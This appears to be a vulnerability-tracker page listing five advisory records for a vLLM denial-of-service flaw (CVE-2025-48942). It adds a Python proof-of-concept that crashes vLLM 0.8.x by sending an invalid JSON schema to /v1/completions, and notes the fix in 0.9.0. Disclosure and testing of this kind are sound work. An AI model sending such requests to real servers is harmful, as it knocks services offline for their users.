Count: 5
| Vulnerability | CVSS | EPSS | Published |
|---|---|---|---|
| CVE-2025-48942: vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which covers a regex instead of a JSON schema. Version 0.9.0 fixes the issue. | CVSS3: 4.3 | 0% (Low) | 7 months ago |
| CVE-2025-48942: vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which covers a regex instead of a JSON schema. Version 0.9.0 fixes the issue. | CVSS3: 6.5 | 0% (Low) | 7 months ago |
| CVE-2025-48942: vLLM is an inference and serving engine for large language models (LLM ... | CVSS3: 6.5 | 0% (Low) | 7 months ago |
| GHSA-6qc9-v4r8-22xg: vLLM DOS: Remotely kill vLLM over HTTP with an invalid JSON schema | CVSS3: 6.5 | 0% (Low) | 7 months ago |
| BDU:2025-11321: A vulnerability in the v1/completions interface of the vLLM library for working with large language models (LLMs) allows an attacker to cause a denial of service | CVSS3: 6.5 | 0% (Low) | 8 months ago |
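The records above all describe the same denial-of-service pattern: on vLLM 0.8.x, a single HTTP request to /v1/completions that asks for guided decoding with an invalid JSON schema can take down the whole server. The sketch below illustrates the request shape only; the base URL, model name, schema contents, and the use of the `guided_json` extra parameter are assumptions for a local test deployment, not details taken from the advisories.

```python
"""
Minimal reproduction sketch for the CVE-2025-48942 class of issue.

Assumptions (not from the advisory text): a vLLM 0.8.x OpenAI-compatible
server listens on http://localhost:8000, serves the placeholder model
"facebook/opt-125m", and accepts the "guided_json" extra parameter.
Only run this against servers you own: on affected versions the request
can crash the whole server.
"""
import requests

BASE_URL = "http://localhost:8000"   # assumed local test deployment
MODEL = "facebook/opt-125m"          # placeholder model name

# Syntactically valid JSON, but not a valid JSON Schema: the bogus "type"
# value should fail when the guided-decoding backend compiles it, which on
# vulnerable versions tears down the engine instead of returning an error.
invalid_schema = {
    "type": "object",
    "properties": {"answer": {"type": "definitely-not-a-json-type"}},
}

payload = {
    "model": MODEL,
    "prompt": "Return a JSON object.",
    "max_tokens": 16,
    "guided_json": invalid_schema,   # guided-decoding extra parameter
}

resp = requests.post(f"{BASE_URL}/v1/completions", json=payload, timeout=30)
print(resp.status_code, resp.text[:200])

# On a patched server (>= 0.9.0) this should come back as an HTTP 4xx
# validation error; on 0.8.x the engine process may die instead, after
# which all subsequent requests fail until the server is restarted.
```

The only remediation listed in these records is upgrading to vLLM 0.9.0 or later, where the invalid schema is rejected as a request validation error rather than propagating into the engine.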